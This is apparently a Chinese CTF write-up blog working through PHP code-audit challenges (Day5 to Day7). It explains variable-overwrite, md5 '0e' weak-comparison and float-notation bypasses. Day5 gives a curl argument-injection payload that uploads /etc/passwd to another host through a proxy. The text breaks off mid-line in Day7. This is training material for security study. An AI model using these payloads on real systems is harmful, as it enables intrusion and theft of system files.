<h2 id="Day5"><a href="#Day5" class="headerlink" title="Day5"></a>Day5</h2><h3 id="Code-2"><a href="#Code-2" class="headerlink" title="Code"></a>Code</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> highlight_file(<span class="string">&#x27;index.php&#x27;</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">waf</span>(<span class="params"><span class="variable">$a</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">foreach</span>(<span class="variable">$a</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/flag/i&#x27;</span>,<span class="variable">$key</span>))&#123;</span><br><span class="line">            <span class="keyword">exit</span>(<span class="string">&#x27;are you a hacker&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">foreach</span>(<span class="keyword">array</span>(<span class="string">&#x27;_POST&#x27;</span>, <span class="string">&#x27;_GET&#x27;</span>, <span class="string">&#x27;_COOKIE&#x27;</span>) <span class="keyword">as</span> <span class="variable">$__R</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$$__R</span>) &#123; </span><br><span class="line">        <span class="keyword">foreach</span>(<span class="variable">$$__R</span> <span class="keyword">as</span> <span class="variable">$__k</span> =&gt; <span class="variable">$__v</span>) &#123; </span><br><span class="line">            <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$$__k</span>) &amp;&amp; <span class="variable">$$__k</span> == <span class="variable">$__v</span>) <span class="keyword">unset</span>(<span class="variable">$$__k</span>); </span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_POST</span>) &#123; waf(<span class="variable">$_POST</span>);&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_GET</span>) &#123; waf(<span class="variable">$_GET</span>); &#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_COOKIE</span>) &#123; waf(<span class="variable">$_COOKIE</span>);&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_POST</span>) extract(<span class="variable">$_POST</span>, EXTR_SKIP);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_GET</span>) extract(<span class="variable">$_GET</span>, EXTR_SKIP);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>] === <span class="variable">$_GET</span>[<span class="string">&#x27;hongri&#x27;</span>])&#123;</span><br><span class="line">        <span class="keyword">exit</span>(<span class="string">&#x27;error&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(md5(<span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>] ) == md5(<span class="variable">$_GET</span>[<span class="string">&#x27;hongri&#x27;</span>]))&#123;</span><br><span class="line">        <span class="variable">$url</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line">        <span class="variable">$urlInfo</span> = parse_url(<span class="variable">$url</span>);</span><br><span class="line">        <span class="keyword">if</span>(!(<span class="string">&quot;http&quot;</span> === strtolower(<span class="variable">$urlInfo</span>[<span class="string">&quot;scheme&quot;</span>]) || <span class="string">&quot;https&quot;</span>===strtolower(<span class="variable">$urlInfo</span>[<span class="string">&quot;scheme&quot;</span>])))&#123;</span><br><span class="line">            <span class="keyword">die</span>( <span class="string">&quot;scheme error!&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$url</span> = escapeshellarg(<span class="variable">$url</span>);</span><br><span class="line">        <span class="variable">$url</span> = escapeshellcmd(<span class="variable">$url</span>);</span><br><span class="line">        system(<span class="string">&quot;curl &quot;</span>.<span class="variable">$url</span>);</span><br><span class="line">        <span class="keyword">echo</span>(<span class="string">&#x27;curl &#x27;</span>.<span class="variable">$url</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">  </span><br><span class="line"><span class="comment">#flag.php</span></span><br><span class="line">  <span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$flag</span> = <span class="string">&quot;HRCTF&#123;Are_y0u_maz1ng&#125;&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h3 id="解-4"><a href="#解-4" class="headerlink" title="解:"></a>解:</h3><p><strong>变量覆盖</strong></p>
<p>  为了方便了解下面代码，先了解一下<code>$$a</code>的意思</p>
<p>  <code>PHP中$a为变量,$$a为可变变量</code></p>
<p>  所谓的<code>可变变量</code>就是取变量的值作为这个<code>可变变量</code>的名，看下<code>Demo</code>就明白了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="string">&#x27;ling&#x27;</span>;</span><br><span class="line"><span class="variable">$$a</span> =<span class="string">&#x27;z&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>.<span class="string">&quot;&lt;br/&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$$a</span>.<span class="string">&quot;&lt;br/&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$ling</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/11/AfSh43qawXyTvY8.png" alt="image-20220107114655928"></p>
<p>  当请求发送到<code>PHP</code>时，<code>foreach</code>会一直循环获取<code>GET、POST</code>请求和<code>Cookie</code>信息(由于Cookie在下面没有任何作用，所以我会忽略<code>Cookie</code>请求)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span>(<span class="keyword">array</span>(<span class="string">&#x27;_POST&#x27;</span>, <span class="string">&#x27;_GET&#x27;</span>, <span class="string">&#x27;_COOKIE&#x27;</span>) <span class="keyword">as</span> <span class="variable">$__R</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$$__R</span>) &#123; </span><br><span class="line">        <span class="keyword">foreach</span>(<span class="variable">$$__R</span> <span class="keyword">as</span> <span class="variable">$__k</span> =&gt; <span class="variable">$__v</span>) &#123; </span><br><span class="line">            <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$$__k</span>) &amp;&amp; <span class="variable">$$__k</span> == <span class="variable">$__v</span>) <span class="keyword">unset</span>(<span class="variable">$$__k</span>); </span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>  (<code>or</code>代表或字的意思)</p>
<p>  第一行代码循环检查是否存在<code>GET or POST </code>请求然后将<code>$__R</code>值设置为<code>_GET或_POST</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$__R</span> = _GET <span class="keyword">or</span> _POST</span><br></pre></td></tr></table></figure>

<p>  第二行代码判断<code>$$__R</code>数据是否存在，这时候的<code>$$__R</code>值就应该是<code>$_GET or $_POST</code>了，这是<code>$__R=_GET or _POST</code>的原因</p>
<p>  第三行代码将<code>GET or POST</code>请求数组分解为<code>$__k和$__v</code>，也就是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$__k</span>=flag</span><br><span class="line"><span class="variable">$__v</span>=<span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/11/3YXEn51zat8UeWR.png" alt="image-20220107122248055"></p>
<p>  第四行代码判断<code>$$__k</code>变量是否设置,同时<code>$$__k</code>等于<code>$$__v</code>就清除<code>$$__k</code></p>
<p>  <code>php</code>中存在一个特点，就是<code>GET</code>请求或者<code>POST</code>请求是可以共存的，我们可以利用这个特定进行绕过<code>waf</code>函数</p>
<p>  当以<code>GET</code>请求发送<code>flag=test</code>同时以<code>POST</code>请求发送<code>_GET[flag]=test</code>，这时候</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$__R</span> = <span class="string">&quot;_POST&quot;</span></span><br><span class="line"><span class="variable">$__K</span> = <span class="string">&quot;_GET&quot;</span></span><br><span class="line"><span class="variable">$$__k</span> = <span class="string">&quot;[&#x27;flag&#x27;=&gt;&#x27;test&#x27;]&quot;</span></span><br><span class="line"><span class="variable">$__v</span> = <span class="keyword">array</span>(<span class="string">&quot;falg&quot;</span>=&gt;<span class="string">&#x27;test&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>  现在<code>$$__k==$__v</code>了，所以会清掉<code>GET</code>请求的<code>[&#39;flag&#39;=&gt;&#39;test&#39;]</code>,现在只剩下<code>$_POST[_GET[flag]=test]</code>,由于<code>waf</code>函数只有一个<code>foraech</code>所有到检测时<code>$key=_GET</code>就不会进到<code>exit</code>退出</p>
<p>  看到<code>extract</code>函数</p>
<p>  当<code>POST</code>经过<code>extract</code>时，数组中的<code>_GET</code>就会变成<code>$_GET</code>变量,这时候<code>$_GET</code>变量就又重新创建了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$_POST</span>) extract(<span class="variable">$_POST</span>, EXTR_SKIP);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_GET</span>) extract(<span class="variable">$_GET</span>, EXTR_SKIP);</span><br></pre></td></tr></table></figure>

<p>  如果不熟悉<code>extract</code>函数的可以看下下面的mode</p>
<p>  <code>extract</code>会将数组中的<code>key</code>值变成变量名，<code>EXTR_SKIP</code>参数则表示，前面存在此名的变量就不进行覆盖变量处理</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$b</span> = <span class="keyword">array</span>(<span class="string">&#x27;ling&#x27;</span>=&gt;<span class="string">&#x27;1&#x27;</span>);</span><br><span class="line">extract(<span class="variable">$b</span>);</span><br><span class="line">print_r(<span class="variable">$ling</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">#输出结果</span></span><br><span class="line"><span class="number">1</span></span><br><span class="line">  </span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$ling</span>=<span class="string">&#x27;2&#x27;</span>;</span><br><span class="line"><span class="variable">$b</span> = <span class="keyword">array</span>(<span class="string">&#x27;ling&#x27;</span>=&gt;<span class="string">&#x27;1&#x27;</span>);</span><br><span class="line">extract(<span class="variable">$b</span>,EXTR_SKIP);</span><br><span class="line">print_r(<span class="variable">$ling</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">  </span><br><span class="line"><span class="comment">#输出结果</span></span><br><span class="line"><span class="number">2</span></span><br></pre></td></tr></table></figure>



<p>  <code>md5</code>判断，由于采用了弱对比，使用<code>md5</code>加密后以<code>0e</code>开头的<strong>纯数字</strong>就可以绕过了</p>
<p>  加密前的payload<code>s1502113478a</code> <code>s1885207154a</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(md5(<span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>] ) == md5(<span class="variable">$_GET</span>[<span class="string">&#x27;hongri&#x27;</span>]))&#123;...&#125;</span><br></pre></td></tr></table></figure>

<p>  来到最终BOSS<code>escapeshellarg、escapeshellcmd</code>哼哈二将面前了，只要解决他们，我们就能获取<code>flag</code></p>
<ul>
<li><p><code>escapeshellarg</code> 在字符串周围添加一个单引号并引用<code>\</code>转义任何现有的单引号,在 Windows 上，<code>escapeshellarg()</code>用空格替换百分号、感叹号（延迟变量替换）和双引号，并在字符串周围添加双引号。此外，连续反斜杠 ( <code>\</code>) 的每一连串都被一个额外的反斜杠转义。</p>
</li>
<li><p><code>escapeshellcmd</code> 给下列<code>| * ? ~ &lt;&gt; ^ () [] &#123;&#125; $ \ \x0A \xFF</code>字符前面添加一个<code>反斜杠</code>，当<code>单引号或双引号</code>不是一整对时进行转义，在Windows上所有这些字符加上<code>% !</code>前面都有一个脱字符<code>^</code> </p>
<p>  由于<code>escapeshellcmd</code>歧视单身的<code>&#39; &quot;</code>，不是成对的不会进行转义，我们只要输入一个<code>&#39;</code>就能将之前的转义打乱，让我们后续的命令能跳出<code>url</code></p>
</li>
</ul>
<p><img src="https://s2.loli.net/2022/01/11/bC3xer6aYBtNikc.png" alt="image-20220107141020090"></p>
<p>  <code>curl</code>存在<code>-F</code>提交表单的方法，同时也可以提交文件，用法<code>curl -F &quot;web=@index.html;type=text/html&quot; url.com</code></p>
<p>  那么最终的payload为</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://baidu.com/<span class="string">&#x27; -F file=@/etc/passwd -x localhost:1234</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/11/pGJ7TM9O4axb1YD.png" alt="image-20220107153740886"></p>
<p>  <strong>这个CTF 对目标的Curl 版本有要求，版本需要在<code>7.19.7</code>左右</strong></p>
<h2 id="Day6"><a href="#Day6" class="headerlink" title="Day6"></a>Day6</h2><p>  虽然本题正则偏多，但是正则不是很难，难的是你对语言类型的深度了解，不过整体上该题还是挺有意思的，我挺喜欢的</p>
<h3 id="code-1"><a href="#code-1" class="headerlink" title="code"></a>code</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>  (<span class="string">&quot;POST&quot;</span> == <span class="variable">$_SERVER</span>[<span class="string">&#x27;REQUEST_METHOD&#x27;</span>])</span><br><span class="line">&#123;</span><br><span class="line">    </span><br><span class="line">    <span class="variable">$password</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>];</span><br><span class="line">   </span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="number">0</span> &gt;= preg_match(<span class="string">&#x27;/^[[:graph:]]&#123;12,&#125;$/&#x27;</span>, <span class="variable">$password</span>))  </span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;Wrong Format&#x27;</span>;</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">while</span> (<span class="literal">TRUE</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="variable">$reg</span> = <span class="string">&#x27;/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/&#x27;</span>;</span><br><span class="line">        var_dump( preg_match_all(<span class="variable">$reg</span>, <span class="variable">$password</span>, <span class="variable">$arr</span>));</span><br><span class="line">        <span class="keyword">if</span> (<span class="number">6</span> &gt; preg_match_all(<span class="variable">$reg</span>, <span class="variable">$password</span>, <span class="variable">$arr</span>))</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="variable">$c</span> = <span class="number">0</span>;</span><br><span class="line">        <span class="variable">$ps</span> = <span class="keyword">array</span>(<span class="string">&#x27;punct&#x27;</span>, <span class="string">&#x27;digit&#x27;</span>, <span class="string">&#x27;upper&#x27;</span>, <span class="string">&#x27;lower&#x27;</span>);</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$ps</span> <span class="keyword">as</span> <span class="variable">$pt</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> (preg_match(<span class="string">&quot;/[[:<span class="subst">$pt</span>:]]+/&quot;</span>, <span class="variable">$password</span>))</span><br><span class="line">            <span class="variable">$c</span> += <span class="number">1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$c</span> &lt; <span class="number">3</span>) <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">if</span> (<span class="string">&quot;42&quot;</span> == <span class="variable">$password</span>) <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">echo</span> <span class="string">&#x27;Wrong password&#x27;</span>;</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">  </span><br><span class="line"><span class="comment">#falg.php</span></span><br><span class="line"><span class="meta">&lt;?php</span> <span class="variable">$flag</span> = <span class="string">&quot;HRCTF&#123;Pr3g_R3plac3_1s_Int3r3sting&#125;&quot;</span>;<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h3 id="解-5"><a href="#解-5" class="headerlink" title="解:"></a>解:</h3><p>  本题的正则有不少，现在我们先看第一个正则</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="number">0</span> &gt;= preg_match(<span class="string">&#x27;/^[[:graph:]]&#123;12,&#125;$/&#x27;</span>, <span class="variable">$password</span>))  </span><br><span class="line">   &#123;</span><br><span class="line">       <span class="keyword">echo</span> <span class="string">&#x27;Wrong Format&#x27;</span>;</span><br><span class="line">       <span class="keyword">exit</span>;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>[[:graph:]]</code> 匹配任何可见字符串，除了<code>空格</code></p>
</li>
<li><p><code>&#123;12,&#125;</code> 匹配至少12次字符串</p>
</li>
<li><p><code>/^</code> 正则开头</p>
</li>
<li><p><code>$/</code> 正则结尾</p>
<p>  <code>preg_match</code>匹配成功会返回<code>1</code>,所以我们需要输入12个字符串<code>aaaaaaaaaaaa</code>跳出该<code>if</code></p>
<p>  接着就是第二个正则</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$reg</span> = <span class="string">&#x27;/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/&#x27;</span>;</span><br><span class="line">        <span class="keyword">if</span> (<span class="number">6</span> &gt; preg_match_all(<span class="variable">$reg</span>, <span class="variable">$password</span>, <span class="variable">$arr</span>))</span><br><span class="line">            <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>[[:punct:]]</code> 匹配标点符号</p>
</li>
<li><p><code>[[:digit:]]</code> 匹配数字字符，范围[0-9]</p>
</li>
<li><p><code>[[:upper:]]</code> 匹配大写字母字符，范围[A-Z]</p>
</li>
<li><p><code>[[:lower:]]</code> 匹配小写字母字符，范围[a-z]</p>
</li>
<li><p><code>preg_match_all</code> 匹配正则时找到第一个匹配后，从最后一个匹配的末尾进行后续搜索</p>
<p>  由于<code>preg_match_all</code>的机制找到一个符合正则时就开始沿用最后一个匹配正则的原因，我们不能连段的都是同一个匹配范围，需要间隔,这时候我们的<code>payload</code>应该是<code>aAaAaAaaaaaaa</code>这样，程序才能继续往下走</p>
<p>  看到最后的正则</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$c</span> = <span class="number">0</span>;</span><br><span class="line"><span class="variable">$ps</span> = <span class="keyword">array</span>(<span class="string">&#x27;punct&#x27;</span>, <span class="string">&#x27;digit&#x27;</span>, <span class="string">&#x27;upper&#x27;</span>, <span class="string">&#x27;lower&#x27;</span>);</span><br><span class="line"><span class="keyword">foreach</span> (<span class="variable">$ps</span> <span class="keyword">as</span> <span class="variable">$pt</span>)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">if</span> (preg_match(<span class="string">&quot;/[[:<span class="subst">$pt</span>:]]+/&quot;</span>, <span class="variable">$password</span>))</span><br><span class="line">	<span class="variable">$c</span> += <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$c</span> &lt; <span class="number">3</span>) <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>

<p>  该正则要求输入的内容在<code>标点符号、数字字符、大写字母、小写字母</code>四选三，现在payload应该是<code>aAaAaA1aaaaaa</code></p>
<p>  现在看到最后的代码</p>
<p>  最后的判断需要输入的内容<code>等于42</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="string">&quot;42&quot;</span> == <span class="variable">$password</span>) <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">echo</span> <span class="string">&#x27;Wrong password&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>  结合上面的所有条件，现在的<code>payload</code>需要满足<code>标点符号、数字字符、大写字母、小写字母</code>四选三同时最后的结果还要等于<code>42</code></p>
<p>  我们可以采用<code>float</code>来编写<code>payload</code></p>
<p>  <code>float</code>中可以用字母<code>e或E</code>来代表<code>10的n次幂</code>，如果不明白看下面的<code>demo</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="number">1.234</span>; </span><br><span class="line"><span class="variable">$b</span> = <span class="number">7.1e100</span>; </span><br><span class="line"><span class="variable">$c</span> = <span class="number">7.1e1</span>; </span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>.<span class="string">&quot;&lt;br/&gt;&quot;</span>.<span class="variable">$b</span>.<span class="string">&quot;&lt;br/&gt;&quot;</span>.<span class="variable">$c</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/11/2fuwZ5byKsDhlSE.png" alt="image-20220108073439117"></p>
<p>  最终<code>payload:</code></p>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">42.0000e-0000</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/11/9GdNeJkEZY6RBun.png" alt="image-20220108073640709"></p>
<h2 id="Day7"><a href="#Day7" class="headerlink" title="Day7"></a>Day7</h2><p>  本题相比前面两题就相对简单许多，没有什么难点，不过也挺有趣</p>
<h3 id="Code-3"><a href="#Code-3" class="headerlink" title="Code"></a>Code</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="string">&quot;hongri&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>;</span><br><span class="line"><span class="variable">$id</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line">@parse_str(<span class="variable">$id</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$a</span>[<span class="number">0</span>] != <span class="string">&#x27;QNKCDZO&#x27;</span> &amp;&amp; md5(<span class="variable">$a</span>[<span class="number">0</span>]) == md5(<span class="string">&#x27;QNKCDZO&#x27;</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;a href=&quot;uploadsomething.php&quot;&gt;flag is here&lt;/a&gt;&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#uploadsomething.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">header(<span class="string">&quot;Content-type:text/html;charset=utf-8&quot;</span>);</span><br><span class="line"><span class="variable">$referer</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_REFERER&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$referer</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$referer</span>)!== <span class="literal">false</span>) &#123;</span><br><span class="line">    <span class="variable">$savepath</span> = <span class="string">&quot;uploads/&quot;</span> . sha1(<span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]) . <span class="string">&quot;/&quot;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$savepath</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;ok&#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span> (!is_dir(<span class="variable">$savepath</span>)) &#123;</span><br><span class="line">        <span class="variable">$oldmask</span> = umask(<span class="number">0</span>);</span><br><span class="line">        mkdir(<span class="variable">$savepath</span>, 